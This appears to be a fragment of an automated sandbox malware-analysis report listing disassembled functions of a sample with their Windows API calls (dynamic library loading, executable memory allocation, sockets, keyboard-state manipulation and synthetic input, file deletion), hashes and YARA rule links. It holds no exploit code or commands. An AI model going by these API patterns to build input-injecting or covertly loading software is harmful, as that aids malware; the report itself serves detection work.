                                                                  • API String ID: 2574300362-4033151799
                                                                  • Opcode ID: aa989e441578f85146f8f9874ef9a0cb6555b41fb33146b330d3299911966230
                                                                  • Instruction ID: 06d3332892d7a64bf8a56113c91645fc858525c3aa12c446cd0960e7ed1be638
                                                                  • Opcode Fuzzy Hash: aa989e441578f85146f8f9874ef9a0cb6555b41fb33146b330d3299911966230
                                                                  • Instruction Fuzzy Hash: 00D0C232814312CFC3208F70C80924272D8AF41341F10CC3DA88AD6150E6B0D4D0CA40
                                                                  Function 009690E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00968CF4,?,0097F910), ref: 009690EE
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00969100
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  • API String ID: 2574300362-199464113
                                                                  • Opcode ID: 21077988b9878fc11f4be432907df14c000f3762cd1bce809343a6fbc2c589cc
                                                                  • Instruction ID: b5ccfd61854ae903313681eeaeac43dba3b65c8c813ed939a67e57d2b2aebe07
                                                                  • Opcode Fuzzy Hash: 21077988b9878fc11f4be432907df14c000f3762cd1bce809343a6fbc2c589cc
                                                                  • Instruction Fuzzy Hash: 81D0173652C713CFDB209F31D82960676E8AF06395F22C83A948AE6590EA70C8C0CA90
                                                                  Function 00931714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime__swprintf
                                                                  • String ID: %.3d$WIN_XPe
                                                                  • API String ID: 2070861257-2409531811
                                                                  • Opcode ID: 66fa7e4ae2f038a0304a216dee5f4d942fac51589131452f887e37ba9ef243a6
                                                                  • Instruction ID: 77ff0525c5270dd0d17d3a337dfb6c3a22fc93450448eeb3e378f512745f59dd
                                                                  • Opcode Fuzzy Hash: 66fa7e4ae2f038a0304a216dee5f4d942fac51589131452f887e37ba9ef243a6
                                                                  • Instruction Fuzzy Hash: 01D0177290810CEBCB009B9098898FA77BCBB19301F180862B507E2060E62A8B94EE21
                                                                  Function 0094717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff5837a6e073748de72f8743f2bac9f8e4684fc4ac3afef08a8eaec9c34fe44c
                                                                  • Instruction ID: 334be60bf5ec8132ebef514c84abde0025e302fdba93ef483f601271641668ce
                                                                  • Opcode Fuzzy Hash: ff5837a6e073748de72f8743f2bac9f8e4684fc4ac3afef08a8eaec9c34fe44c
                                                                  • Instruction Fuzzy Hash: A4C12C75A0421AEFCB14CFA4C894EAEFBB9FF48714B154998E805EB261D730DD81DB90
                                                                  Function 0096E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0096E0BE
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0096E101
                                                                    • Part of subcall function 0096D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0096D7C5
                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0096E301
                                                                  • _memmove.LIBCMT ref: 0096E314
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                  • String ID:
                                                                  • API String ID: 3659485706-0
                                                                  • Opcode ID: dace2447935303312b1676bb733fad34cb719328f3ee2d7a37c11da71a988a60
                                                                  • Instruction ID: 2b1effd2c27a28ea7f2802bd51f101e4449683fd8725d1e7468961570d708897
                                                                  • Opcode Fuzzy Hash: dace2447935303312b1676bb733fad34cb719328f3ee2d7a37c11da71a988a60
                                                                  • Instruction Fuzzy Hash: FEC15375A083018FC714DF28C490A6ABBE4FF89314F04896EF999DB351D771E946CB82
                                                                  Function 00968093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 009680C3
                                                                  • CoUninitialize.OLE32 ref: 009680CE
                                                                    • Part of subcall function 0094D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0094D5D4
                                                                  • VariantInit.OLEAUT32(?), ref: 009680D9
                                                                  • VariantClear.OLEAUT32(?), ref: 009683AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                  • String ID:
                                                                  • API String ID: 780911581-0
                                                                  • Opcode ID: 5c4bf98e70e2c2cfb708f988abed56b0461bdb43ad09ecab1a4bf035f6e313f3
                                                                  • Instruction ID: f43ba525e7e4152b60b7e446428c167a843dd7a7a1afcd0c6b5aa6641a4de761
                                                                  • Opcode Fuzzy Hash: 5c4bf98e70e2c2cfb708f988abed56b0461bdb43ad09ecab1a4bf035f6e313f3
                                                                  • Instruction Fuzzy Hash: A8A123752047059FCB10DF68C495B2AB7E4FF89364F044958FA9A9B3A1CB34ED45CB82
                                                                  Function 00947530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00982C7C,?), ref: 009476EA
                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00982C7C,?), ref: 00947702
                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,0097FB80,000000FF,?,00000000,00000800,00000000,?,00982C7C,?), ref: 00947727
                                                                  • _memcmp.LIBCMT ref: 00947748
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                  • String ID:
                                                                  • API String ID: 314563124-0
                                                                  • Opcode ID: 458e50a3f7899564a245f8f31077f9b8082ed8847f3d170d952caf47eea18b2a
                                                                  • Instruction ID: 47d41c6ad8360df56c364aef7848821cb52ea7448a3f71a4da3826bc72fb7fd7
                                                                  • Opcode Fuzzy Hash: 458e50a3f7899564a245f8f31077f9b8082ed8847f3d170d952caf47eea18b2a
                                                                  • Instruction Fuzzy Hash: 3C81EB75A00109EFCB04DFE8C984EEEB7B9FF89315F204558E506AB250DB71AE46CB61
                                                                  Function 0094687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: 6bc187ad13bb3ad30475a7efb076ad18afaf80e14f29b2d7444eca30a74ce31c
                                                                  • Instruction ID: bf8dd3177970fb87897ede300eb9f95da5bc5ea5d880938ba82e08592846a343
                                                                  • Opcode Fuzzy Hash: 6bc187ad13bb3ad30475a7efb076ad18afaf80e14f29b2d7444eca30a74ce31c
                                                                  • Instruction Fuzzy Hash: 4F51B6B47047059ADB24EF65D895F7AB3E9EF86310F20CC1FE586EB291DA74D8808712
                                                                  Function 009797F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(0139EB50,?), ref: 00979863
                                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00979896
                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00979903
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: 9d7898772457ef5486d6651946221daec5753a3118a656723f960257710dede1
                                                                  • Instruction ID: 71eacb3fe2d96db7af72cf7742fc536065aee49912282676f76f908e7baa3b7f
                                                                  • Opcode Fuzzy Hash: 9d7898772457ef5486d6651946221daec5753a3118a656723f960257710dede1
                                                                  • Instruction Fuzzy Hash: 12515136A00208EFDF10DF64C980AAE7BB9FF45360F10825DF9599B2A0D731AD81DB91
                                                                  Function 00949A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00949AD2
                                                                  • __itow.LIBCMT ref: 00949B03
                                                                    • Part of subcall function 00949D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00949DBE
                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00949B6C
                                                                  • __itow.LIBCMT ref: 00949BC3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: f642355f67d30d5982d6f662a6c2ad328dd6d0ab414ef792533abf7eb3e8dfde
                                                                  • Instruction ID: e47ad3fe476e8c5ee48a791e71e969bef5e7edec5dfbb2ba13dcf0ac5f82c406
                                                                  • Opcode Fuzzy Hash: f642355f67d30d5982d6f662a6c2ad328dd6d0ab414ef792533abf7eb3e8dfde
                                                                  • Instruction Fuzzy Hash: CD414174A0020CABEF15DF64D855FFE7BB9EF85724F000069FA05A7291DB749944CBA2
                                                                  Function 009669AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 009669D1
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009669E1
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00966A45
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00966A51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                                  • String ID:
                                                                  • API String ID: 2214342067-0
                                                                  • Opcode ID: af11fd79c6d2fdbf79af7fd7528519ea58493444d76074a5b832c8f343f23abf
                                                                  • Instruction ID: 77ef30a27ba0b3d026269cb3f589546a03c540f9abc92fd9609adf4b569f2767
                                                                  • Opcode Fuzzy Hash: af11fd79c6d2fdbf79af7fd7528519ea58493444d76074a5b832c8f343f23abf
                                                                  • Instruction Fuzzy Hash: 2F418375740204AFEB50BF78CC86F7977A8EF44B54F048468FA59EB2D2DA709D008B52
                                                                  Function 0096641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0097F910), ref: 009664A7
                                                                  • _strlen.LIBCMT ref: 009664D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen
                                                                  • String ID:
                                                                  • API String ID: 4218353326-0
                                                                  • Opcode ID: 7f4a368403816182af41918d6656042734b9c3ba302ad45336ed4ea597df4b1c
                                                                  • Instruction ID: d96c715e31e2134ce8a0e2f0e9c00cbbed48d71e41bdb75d5d85901aa63574b0
                                                                  • Opcode Fuzzy Hash: 7f4a368403816182af41918d6656042734b9c3ba302ad45336ed4ea597df4b1c
                                                                  • Instruction Fuzzy Hash: 78418371600118ABCB14EBB8EC96FBEB7A9EF44314F148155F91AD7292DB30AD44CB51
                                                                  Function 0095B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0095B89E
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0095B8C4
                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0095B8E9
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0095B915
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 3321077145-0
                                                                  • Opcode ID: 8119592d7099e720d3a7923e606c3722e7dded77e6160587fffeb1d6e1088e1d
                                                                  • Instruction ID: de9ec1e569c9766890c357bc7b491ca08b495b4191ffff04cc33a06c98a7faef
                                                                  • Opcode Fuzzy Hash: 8119592d7099e720d3a7923e606c3722e7dded77e6160587fffeb1d6e1088e1d
                                                                  • Instruction Fuzzy Hash: A7412C35600514DFCB10EF29C494A69BBE5FF89354F098098ED8AAB362CB30FD45DB92
                                                                  Function 00978851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009788DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 4fb75a5b29334a43e8fdca0d4ac144c32c9f8a690946cb1fc417c085965f393c
                                                                  • Instruction ID: 5c918236a8fe8a3eaea8b2a149a4a216ca47e1e74dd9f3c2a38481ff23537be4
                                                                  • Opcode Fuzzy Hash: 4fb75a5b29334a43e8fdca0d4ac144c32c9f8a690946cb1fc417c085965f393c
                                                                  • Instruction Fuzzy Hash: 21310632694109FFEB249A68CC4DBFA37A8FB05360F548511FB2DE61A1CE30D9409757
                                                                  Function 0097AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 0097AB60
                                                                  • GetWindowRect.USER32(?,?), ref: 0097ABD6
                                                                  • PtInRect.USER32(?,?,0097C014), ref: 0097ABE6
                                                                  • MessageBeep.USER32(00000000), ref: 0097AC57
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: 4862f6d57dcb14cdb661022f88a947f5464c3a3ed7e533506ac10e65f9e397b3
                                                                  • Instruction ID: cae5306dbecbca3c2e080eed3c5e74e33f8bcb8adcfd05b6cfaee1d544107bb4
                                                                  • Opcode Fuzzy Hash: 4862f6d57dcb14cdb661022f88a947f5464c3a3ed7e533506ac10e65f9e397b3
                                                                  • Instruction Fuzzy Hash: EC418E32604119EFCB12DF58C884B6D7BF9FB89310F18C5A9E85CDB260D730A841DB92
                                                                  Function 00950AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00950B27
                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00950B43
                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00950BA9
                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00950BFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 3852abc956066233060e2e0fc00d31adea129be7af486c175123e16eb9b9d738
                                                                  • Instruction ID: 34d5be1083058a3fc68497216a477ce960430f942c388fda55e732c14263da07
                                                                  • Opcode Fuzzy Hash: 3852abc956066233060e2e0fc00d31adea129be7af486c175123e16eb9b9d738
                                                                  • Instruction Fuzzy Hash: BE313530944208AFFF30CB26CC55BFEBBA9ABC531AF08466AFC94521D1C37989889751
                                                                  Function 00950C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00950C66
                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00950C82
                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00950CE1
                                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00950D33
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
